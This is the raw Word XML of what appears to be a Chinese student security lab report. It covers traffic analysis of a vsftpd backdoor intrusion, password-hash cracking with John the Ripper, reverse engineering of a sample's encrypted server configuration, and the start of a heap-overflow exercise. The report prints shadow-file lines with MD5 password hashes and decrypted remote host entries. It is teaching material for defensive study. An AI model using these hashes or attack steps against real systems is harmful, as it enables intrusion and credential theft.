        <w:t>user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>telnetd:*:14715:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proftpd:!:14727:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>statd:*:15474:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>myuser:$1$VO7/0G4e$wLdDg4cV498GFfFr/yL6F0:18385:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>newuser:$1$5GhlnfS5$QA9.s7O.PCN8Jk90lA0ds1:18387:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pP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3" w:name="_Toc19012"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13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拿到的那个压缩包，看到/etc/passwd。说明这是传递用户的用户名和密码，攻击者显然得手了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/etc/passwd中一行记录对应着一个用户，每行记录又被冒号(:)分隔为7个字段，其格式和具体含义如下：用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc28308"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“用户名”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14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是代表用户账号的字符串。通常长度不超过8个字符，并且由大小写字母和/或数字组成。登录名中不能有冒号(:)，因为冒号在这里是分隔符。为了兼容起见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登录名中最好不要包含点字符(.)，并且不使用连字符(-)和加号(+)打头。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc15951"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“口令”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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一些系统中，存放着加密后的用户口令字。虽然这个字段存放的只是用户口令的加密串，不是明文，但是由于/etc/passwd文件对所有用户都可读，所以这仍是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一个安全隐患。因此，现在许多Linux系统（如SVR4）都使用了shadow技术，把真正的加密后的用户口令字存放到/etc/shadow文件中，而在/etc/passwd文件的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口令字段中只存放一个特殊的字符，例如“x”或者“*”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc14025"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“用户标识号”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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是一个整数，系统内部用它来标识用户。一般情况下它与用户名是一一对应的。如果几个用户名对应的用户标识号是一样的，系统内部将把它们视为同一个用户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但是它们可以有不同的口令、不同的主目录以及不同的登录Shell等。通常用户标识号的取值范围是0～65535。0是超级用户root的标识号，1～99由系统保留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作为管理账号，普通用户的标识号从100开始。在Linux系统中，这个界限是500。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc32069"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“组标识号”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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字段记录的是用户所属的用户组。它对应着/etc/group文件中的一条记录。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ind w:leftChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc9544"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“注释性描述”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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字段记录着用户的一些个人情况，例如用户的真实姓名、电话、地址等，这个字段并没有什么实际的用途。在不同的Linux系统中，这个字段的格式并没有统一。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在许多Linux系统中，这个字段存放的是一段任意的注释性描述文字，用做finger命令的输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc22864"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“主目录”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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是用户的起始工作目录，它是用户在登录到系统之后所处的目录。在大多数系统中，各用户的主目录都被组织在同一个特定的目录下，而用户主目录的名称就是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该用户的登录名。各用户对自己的主目录有读、写、执行（搜索）权限，其他用户对此目录的访问权限则根据具体情况设置。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攻击手法分析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使用ftp过滤，查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击机和靶机的ftp报文通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，这个在流量跟踪里有类似的操作。我们可以发现第四行有一个FTP的包，名为user.tgz，并且是攻击主机发送到靶机的，实际上就是之前分析数据。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368290" cy="1682750"/>
            <wp:effectExtent l="0" t="0" r="11430" b="889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图1.13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根据上面的报文通信，我们可以得知</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击者是通过工具发现了VSFTPD源码包存在后门漏洞，然后监听了6200端口，并通过该端口执行恶意命令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通过过滤该端口并追踪tcp流</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以及数据分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，发现攻击者使用id命令获得root权限，然后创建一个新的用户：newuser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之后便是将passwd,shadow这两个文件压缩至user.tgz中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过ftp将该压缩包传输到攻击机中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解密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利用john the ripper这个工具进行暴力破解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得到下面的结果。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807720"/>
            <wp:effectExtent l="0" t="0" r="635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图1.14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20" w:name="_Toc3986"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验问题分析与总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/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实验的难点感觉在于攻击手法的分析和解密过程，特别是解密过程，解密的时候工具的运用即为关键，在查阅一定资料之后才知道john the ripper工具，所以这也考验着工具的使用。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21" w:name="_Toc23610"/>
      <w:bookmarkStart w:id="22" w:name="_Toc4906"/>
      <w:bookmarkStart w:id="23" w:name="_Toc45180074"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议与意见</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkEnd w:id="5"/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本次实验是通过分析抓包的数据，还原攻击的过程。具体过程已经再上面给出。这次实验需要通过经验以及安全方面的只是，推测如何利用漏洞实现攻击的目标。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希望能讲解下解密过程，解密过程是在同学的帮助下完成的，感觉还是不怎么会运用工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc16761"/>
      <w:bookmarkStart w:id="25" w:name="_Toc20552"/>
      <w:bookmarkStart w:id="26" w:name="_Toc45180079"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件逆向</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/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27" w:name="_Toc8849"/>
      <w:bookmarkStart w:id="28" w:name="_Toc12085"/>
      <w:bookmarkStart w:id="29" w:name="_Toc45180080"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/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1, 自己选择合适的逆向分析方式，分析这个样本的功能，并编写行为分析报告文档。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2，自己选择合适的逆向分析方式，并定位到样本中解密服务器相关信息的反汇编代码位置，并写出解密算法的分析文档。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3，自己选择合适的高级语言，还原出解密算法的等价高级语言语法，并解密出远程服务器信息相关的密文。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实验对象分析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这是研究对象，从文件的信息可以看出，这是网络加速器，拥有用户登录等确认身份手段，如图2.1，图2.2。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4573270" cy="2225675"/>
            <wp:effectExtent l="0" t="0" r="1397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图2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3261360" cy="28956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图2.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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打开文件的函数断点(CreateFileA)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点击右键，查找-所有模块的名称，在那个界面直接输入createfileA，在过程中我们可以看到有多个位置调用了CreateFileA，如图2.3。找到地址是76E5DE90这处下断点，如图2.4。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下断点的时候可以在旁边多下几个，因为我尝试过如果只在76EDE98处下断点的话，可能栈中看不到我们期待的消息。然后当我们f9运行到这里时，栈中会显示我们所要探究的对象system.ini，如图2.5。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077595"/>
            <wp:effectExtent l="0" t="0" r="317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540385"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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659890"/>
            <wp:effectExtent l="0" t="0" r="13970" b="127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图2.5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通过F8单步步入，观察栈的变化。发现又一个CreateFileA的调用，根据栈中的信息，我们不难发现打开的正是system.ini，说明程序要开始读取并处理该文件，如图2.6。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我们需要获得文件句柄，观察EAX、ESI寄存器中的值。如图2.7所示，EAX是0x2DC，而ESI的值为0x1。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继续单步步入，跟踪文件句柄，如图2.8发现eax中的值会存储到edi+0x4当中，esi的值存储到edi+0x8当中。记录下edi的地址，为0x185be8。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2880" cy="2389505"/>
            <wp:effectExtent l="0" t="0" r="10160" b="317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图2.6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812800"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1016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图2.7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632585"/>
            <wp:effectExtent l="0" t="0" r="0" b="1333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图2.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pP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循环解密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这里显然有一个循环，显然是访问system.ini的缓存区的内容，因为根据开头的计数EAX=0X00185D20，到最后EAX=0X00185DB6，可以算出差值为0x96，如图2.9。而system.ini中的字节数也正好是那么多，如图2.10。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就在访问缓存之后，又有一个循环过程，基本判断是循环解密过程，如图2.11。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1034415"/>
            <wp:effectExtent l="0" t="0" r="9525" b="190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图2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1731010"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635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图2.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="935990"/>
            <wp:effectExtent l="0" t="0" r="1905" b="889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图2.11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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解密代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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根据图2.11的汇编原理，仿照它的功能，写出一份解密代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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如图2.12解密代码，通过解密代码，我们可以求得system.ini的内容，如图2.13所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2963545"/>
            <wp:effectExtent l="0" t="0" r="14605" b="825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图2.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2085340"/>
            <wp:effectExtent l="0" t="0" r="1905" b="254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图2.13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[更新源]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host01=www.tocqueville.co</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host02=www.leisu100.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[WEB站点]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web=www.tocqueville.co</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protocal=https</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ipaddr=www.tocqueville.co</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>port=80</w:t>
      </w:r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30" w:name="_Toc45180081"/>
      <w:bookmarkStart w:id="31" w:name="_Toc20733"/>
      <w:bookmarkStart w:id="32" w:name="_Toc20540"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验问题分析与总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/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过程中，我开始对CreateFileA函数的用法并不是十分的理解，而在搜索的过程中也发现不止一个该函数被调用，所以最开始的做法就是在每个下面均下断点，再观察栈中的变化将无用的断点删除。但是做过一遍就知道，实际上creatfilea类似于打开文件的系统函数，只要要调用这个函数就会call那个地址，然后根据调试，找到打开我们所要探究的文件的地方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实验过程的难点应该是解密代码的编写，要对找到的解密代码进行分析理解，这也运用了课堂上所讲的知识，对循环分支的理解以及应用。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最后，这个system.ini主要就是地址的更新以及用户登录的作用。</w:t>
      </w:r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33" w:name="_Toc28820"/>
      <w:bookmarkStart w:id="34" w:name="_Toc29160"/>
      <w:bookmarkStart w:id="35" w:name="_Toc45180082"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议与意见</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/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建议加一段游戏破解的逆向过程，个人觉得钱老师课上讲的扫雷和三国志“破解”更趋向于游戏补丁，而不是个人理解上的传统意义的破解。</w:t>
      </w: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宋体" w:hAnsi="宋体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 w:ascii="宋体" w:hAnsi="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc45180075"/>
      <w:bookmarkStart w:id="37" w:name="_Toc24378"/>
      <w:bookmarkStart w:id="38" w:name="_Toc29774"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞挖掘与利用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/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39" w:name="_Toc27091"/>
      <w:bookmarkStart w:id="40" w:name="_Toc45180076"/>
      <w:bookmarkStart w:id="41" w:name="_Toc5580"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/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编译带调试符号的glibc代码，使用gdb调试漏洞程序，分析程序利用过程，并了解malloc和free底层实现；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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题：</w:t>
      </w:r>
      <w:r>
        <w:t>attack.c中680这个数值怎么来的？在分配的内存中覆盖了哪些范围，请画图说明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答：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先看一下漏洞代码，其中主要分配了两块内存，一块666，一块12，然后根据课堂时候的讲解，每个堆中还会有一个chunk，它是不再堆分配的范围当中，所以还要加上两个chunk的1字节。下面就开始解答。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2713990"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1397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图3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="911225"/>
            <wp:effectExtent l="0" t="0" r="6985" b="317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图3.2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1、first块有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
